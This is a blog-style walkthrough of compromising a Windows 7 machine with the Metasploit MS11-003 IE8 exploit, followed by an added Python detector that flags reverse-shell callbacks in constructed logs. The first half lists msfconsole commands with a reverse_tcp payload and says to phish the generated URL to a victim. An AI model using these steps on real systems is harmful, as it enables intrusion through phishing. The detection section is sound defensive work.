Initially I started scanning using Nmap, but ended up with only the basic Windows ports open: 135, 139 and 445.
Then I started to gear up with the SMB exploits available in MSF, but they failed. Finally, an Internet Explorer bug let me OWN the Windows 7 machine.
I owned a LAN machine with this bug and maintained access.
Exploit Details:
Windows 7 for 32-bit Systems with Internet Explorer 8 Remote Code Execution. Severity: Critical
Reference: http://technet.microsoft.com/en-us/security/bulletin/ms11-003
How to Exploit:
1. Launch Metasploit
2. Update it
3. Type msfconsole
4. Search for ms11_003_ie_css_import
5. Use the exploit by choosing reverse TCP as Payload.
msf > use exploit/windows/browser/ms11_003_ie_css_import
msf exploit(ms11_003_ie_css_import) > show payloads
msf exploit(ms11_003_ie_css_import) > set PAYLOAD windows/meterpreter/reverse_tcp
msf exploit(ms11_003_ie_css_import) > set LHOST [MY IP ADDRESS]
msf exploit(ms11_003_ie_css_import) > exploit
6. Share or Phish the Created URL with the Victim
7. Once the Victim opens the URL on IE8, you will get Notified
8. Check sessions -l for a successful session.
9. Now, interact with the session: sessions -i 1
10. Then type shell to see the Windows prompt.
Cheers !!!!! Now you also OWN a Windows 7 machine.
*** My setup includes BackTrack 5 (running Metasploit) and the target is Windows 7 Ultimate Edition with the IE8 browser.
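From the defender's side, the trace this kind of browser exploit leaves is simple: an IE8 client fetches a page from some external host, and seconds later the same client opens an outbound TCP connection back to that same host on a non-web port (the reverse_tcp payload calling home to LHOST). The following added example, which is not part of the original post and does not come from Metasploit or Microsoft, correlates a constructed proxy log with a constructed connection log to flag that pattern; the log formats, addresses and ports are all made up for the example.

```python
"""Flag a browser visit followed by a callback to the same external host.

Both logs below are constructed sample data in an invented format:
proxy log  = "<iso-time> <client-ip> "<user-agent>" <dest-host>:<port>"
conn log   = "<iso-time> <src-ip> <dest-host>:<port>"
"""
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed proxy log: one IE8 client and one non-IE client.
PROXY_LOG = [
    '2011-02-10T10:00:01 192.168.1.20 "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1)" 203.0.113.5:8080',
    '2011-02-10T10:00:05 192.168.1.21 "Mozilla/5.0 (Windows NT 6.1; rv:2.0)" 198.51.100.7:80',
]
# Constructed firewall/flow log. The first line is the suspicious one:
# same client, same external host, non-web port, two seconds after the visit.
CONN_LOG = [
    "2011-02-10T10:00:03 192.168.1.20 203.0.113.5:4444",
    "2011-02-10T10:00:09 192.168.1.21 198.51.100.7:443",
    "2011-02-10T10:05:00 192.168.1.20 203.0.113.5:80",
]

# Ports on which a follow-up connection is normal browsing, not a callback.
WEB_PORTS = {80, 443, 8080, 8443}
# How long after the page visit a callback still counts as related.
WINDOW = timedelta(seconds=60)


def parse_proxy(line):
    """Split a constructed proxy line into (time, client, user_agent, host, port)."""
    ts, client, rest = line.split(" ", 2)
    ua, dest = rest.rsplit(" ", 1)
    host, port = dest.rsplit(":", 1)
    return datetime.fromisoformat(ts), client, ua.strip('"'), host, int(port)


def parse_conn(line):
    """Split a constructed connection line into (time, src, host, port)."""
    ts, src, dest = line.split(" ")
    host, port = dest.rsplit(":", 1)
    return datetime.fromisoformat(ts), src, host, int(port)


def find_callbacks(proxy_lines, conn_lines, window=WINDOW):
    """Return alerts for non-web connections that follow a page visit
    from the same client to the same host within `window`."""
    visits = defaultdict(list)  # (client, host) -> [(visit time, user agent)]
    for line in proxy_lines:
        ts, client, ua, host, _port = parse_proxy(line)
        visits[(client, host)].append((ts, ua))

    alerts = []
    for line in conn_lines:
        ts, src, host, port = parse_conn(line)
        if port in WEB_PORTS:
            continue  # ordinary browsing, ignore
        for visit_ts, ua in visits.get((src, host), []):
            if timedelta(0) <= ts - visit_ts <= window:
                alerts.append({
                    "client": src,
                    "host": host,
                    "port": port,
                    "seconds_after_visit": int((ts - visit_ts).total_seconds()),
                    # IE8 is the browser the post targets; note it explicitly.
                    "ie8_client": "MSIE 8.0" in ua,
                })
    return alerts


if __name__ == "__main__":
    for alert in find_callbacks(PROXY_LOG, CONN_LOG):
        print(alert)
```

On the sample data this reports exactly one alert: 192.168.1.20 visited 203.0.113.5 with an IE8 user agent and connected back to it on port 4444 two seconds later. The 192.168.1.21 traffic is ignored because its follow-up goes to port 443, and the later port-80 connection from 192.168.1.20 is ignored for the same reason. In production the window and the port allow-list are the knobs to tune; the durable fix for the post's scenario is applying the MS11-003 update referenced above, which this correlation only helps you notice is missing.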
